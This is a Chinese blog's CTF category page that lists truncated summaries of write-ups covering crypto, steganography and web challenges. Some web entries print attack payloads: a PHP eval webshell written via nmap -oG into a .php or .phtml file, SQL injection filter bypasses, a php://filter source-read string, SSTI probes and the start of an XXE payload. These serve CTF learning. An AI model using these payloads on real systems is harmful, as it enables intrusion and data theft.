随笔分类 -  CTF

摘要:1.介绍 1.1nmap使用 2.步骤 2.1使用nmap命令输入一句话进行保存。 ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 2.2发现没有成功。使用phtml进行绕过 ' <?= @eval($_POST["pd"]);?> -oG pd.ph 阅读全文
posted @ 2021-11-22 20:13 WeQi_Blog 阅读(281) 评论(0) 推荐(0)
摘要:1.介绍 1.1二次注入 1.2无列名注入 1.3Maria数据库特性 2.步骤 2.1在广告申请界面输入'引号,查看详情界面出现报错,发现存在报错。 2.2 经过尝试发现过滤了空格,or,and,--+,#,order等关键字 order by可以使用group by代替,空格可以使用/**/代替 阅读全文
posted @ 2021-11-22 19:36 WeQi_Blog 阅读(373) 评论(0) 推荐(0)
摘要:1.介绍 1.1python脚本编写 1.2二进制转字符串 2.步骤 2.1解压缩包,在gif文件中发现黑白图片,编写python脚本,得到10二进制字符串。 2.2使用工具进行转码,得到flag。 阅读全文
posted @ 2021-11-20 22:23 WeQi_Blog 阅读(49) 评论(0) 推荐(0)
摘要:1.介绍 1.1Java反编译 1.2Base64编码 2.步骤 2.1下载文件发现是Java应用使用jd-gui进行反编译,发现一个飞机大战程序,在PlaneGameFrame.class文件在找到flag, 2.2输入不对,根据特征判断困难是base64编码,再进行解密得到flag。 阅读全文
posted @ 2021-11-20 21:59 WeQi_Blog 阅读(40) 评论(0) 推荐(0)
摘要:1.介绍 1.1pdf文件特点 1.2摩斯密码 2.步骤 2.1用浏览器打开pdf,全选复制pdf,粘贴在txt文件中,发现由A\B构成的一串字符 2.2使用工具进行摩斯解密,得到flag。 阅读全文
posted @ 2021-11-20 21:45 WeQi_Blog 阅读(64) 评论(0) 推荐(0)
摘要:1.介绍 1.1图片隐写 1.2图片拼接 1.3二维码扫描 1.4Stegsolve的使用 2.步骤 2.1下载附件,查看gif图片,发现有二维码闪过,通过Stegsolve截取下来二维码, 2.2对比正常二维码,发现缺三个角,从网上找一个角,使用画板进行拼接, 2.3使用在线网站扫描得到flag。 阅读全文
posted @ 2021-11-19 21:14 WeQi_Blog 阅读(107) 评论(0) 推荐(0)
摘要:1.介绍 1.1与佛论禅编码 1.2rot13 1.3base64 2.步骤 2.1下载文件打开,查看发现为与佛论禅编码 2.2解密得到类似,base64编码,尝试解密无果 2.3根据题目提示,可能需要rot13解密,rot编码。 2.4再次尝试base64解密,得到flag。 3.借鉴 攻防世界- 阅读全文
posted @ 2021-11-19 20:39 WeQi_Blog 阅读(208) 评论(0) 推荐(0)
摘要:1.介绍 1.1pdf转换转化为word格式。 2.步骤 2.1下载pdf文件,提示图片下面什么都有, 将pdf转化为word,移开照片,得到flag。 3.借鉴 https://www.jianshu.com/p/ba004f745131 阅读全文
posted @ 2021-11-19 18:08 WeQi_Blog 阅读(361) 评论(0) 推荐(0)
摘要:1.介绍 1.1ssti 1.2黑名单绕过 2.步骤 2.1查看源代码,使用了python的flask模板,开始代码审计。 import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop(' 阅读全文
posted @ 2021-11-19 16:45 WeQi_Blog 阅读(234) 评论(0) 推荐(0)
摘要:1.介绍 1.python代码审计 2.python的flask框架 2.步骤 2.1将代码整理,开始进行代码审计。 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request im 阅读全文
posted @ 2021-11-16 21:57 WeQi_Blog 阅读(196) 评论(0) 推荐(0)
摘要:1.介绍 1.1题型rce远程命令漏洞 1.2代码审计 1.3PHP函数 1.4PHP正则匹配 2.步骤 2.1首先进行代码审计 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_sou 阅读全文
posted @ 2021-11-11 21:48 WeQi_Blog 阅读(184) 评论(0) 推荐(0)
摘要:1.发现 1.1没发现提示,使用dirsearch扫描一下后台,扫到一个文件。 1.2打开文件,又是一个文件。 1.3打开文件,提示不是flag。 1.4使用bp抓一下包发现一个文件。 1.5打开文件,修改一下编码,得到PHP代码。 <?php header('Content-type:text/h 阅读全文
posted @ 2021-11-06 17:50 WeQi_Blog 阅读(160) 评论(0) 推荐(0)
摘要:1.发现 1.1打开题目地址,发现PHP代码,进行代码审计。 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = 阅读全文
posted @ 2021-11-05 21:44 WeQi_Blog 阅读(117) 评论(0) 推荐(0)
摘要:1.发现 1.1打开题目地址,一步步按照正常提示购买。输入编号1,价格2 不行。 1.2一个一个输入发现,只有编号4提示,只能输入一个字符。 1.3查看源代码,提示utf-8编码很重要。 2.步骤 2.1再找一个大点的utf-8数。 2.2将0x替为%,输入payload,得到flag。 3.借鉴 阅读全文
posted @ 2021-11-03 16:05 WeQi_Blog 阅读(111) 评论(0) 推荐(0)
摘要:1.发现 1.1打开题目地址,查看源代码,发现Hint页面的源代码有提示cookie。 1.2在flag页面尝试输入,发现返回输入内容。 1.3尝试{{7*7}},发现ssti漏洞,判断是twig。 2.步骤 2.1输入payload,发现不对,抓包,发现user为注入点。 2.2输入payload 阅读全文
posted @ 2021-11-03 15:22 WeQi_Blog 阅读(109) 评论(0) 推荐(0)
摘要:1.发现 1.1打开题目地址,发现为登录框,尝试输入发现只会返回用户名错误。 1.2根据提示XML相对XXE攻击 2步骤 2.1首先进行抓包,然后构造payload。 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY a 阅读全文
posted @ 2021-11-03 14:46 WeQi_Blog 阅读(391) 评论(0) 推荐(0)
摘要:1.发现 1.1打开题目地址随便试试,发现url有传参。 1.2随便传参发现没有反应,查看wp,发现需要伪协议传参 。 php://filter/read=convert.base64-encode/resource=index 1.3发现为base编码,解码后得到源码,对源代码进行分析。 2.步骤 阅读全文
posted @ 2021-11-03 11:14 WeQi_Blog 阅读(276) 评论(0) 推荐(0)
摘要:1.发现 1.1使用dirsearch扫一下,发现存在.git泄露。 1.2使用Git Hack扒下flag.php,index.php,开始审计代码。 #flag.php将内容赋值给flag。 <?php include 'flag.php'; #包含flag.php文件 $yds = "dog" 阅读全文
posted @ 2021-11-03 09:14 WeQi_Blog 阅读(110) 评论(0) 推荐(0)
摘要:1.发现 1.1打开题目地址发现网页一直在刷新,时间一直变。 1.2用burp抓包,发现传入了两个参数,并且前面是函数,后面是格式 猜测func来执行p。 2.步骤 2.1我们传入func=file_get_contents&p=index.php,得到源码。 <?php $disable_fun 阅读全文
posted @ 2021-11-01 21:44 WeQi_Blog 阅读(368) 评论(0) 推荐(0)
摘要:1.发现 1.1打开下载文件,提示为变种凯撒密码。 1.2做以下尝试 afZ_ -> flagrc -> {} 其中ASCII码值的变化为 2.步骤 2.1写一个python脚本,得到flag。 阅读全文
posted @ 2021-11-01 19:59 WeQi_Blog 阅读(233) 评论(0) 推荐(0)